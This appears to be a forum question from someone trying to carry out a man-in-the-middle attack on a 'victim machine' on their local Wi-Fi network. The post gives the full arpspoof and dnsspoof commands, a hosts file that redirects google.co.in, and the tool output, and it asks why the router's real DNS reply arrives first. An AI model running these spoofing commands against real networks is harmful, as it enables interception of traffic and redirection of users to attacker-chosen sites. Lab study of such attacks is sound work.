My aim is to DNSspoof.
My network is using a wireless router with the address 192.168.1.1 and primary DNS is the same as the router address.
I have enabled Kernel IP forward in Linux.
DNS host file is spoofhosts.txt
173.252.74.22 google.co.in
My victim machine is 192.168.1.224
I have done ARPspoof using
#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0
and I have done DNSspoof
ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok:
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53: 32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53: 32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53: 3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53: 3788+ A? google.co.in
I am getting the above responses, but DNSspoofing is not working for the victim.
However, I have observed in Wireshark at the victim system. It gives me this information by that I have observed that the DNS response is coming from the router faster than me.
See the second line that is giving the response from directly from the router with valid Google IP.
How to solve this? Is this the problem with the DNSspoof command? What happend?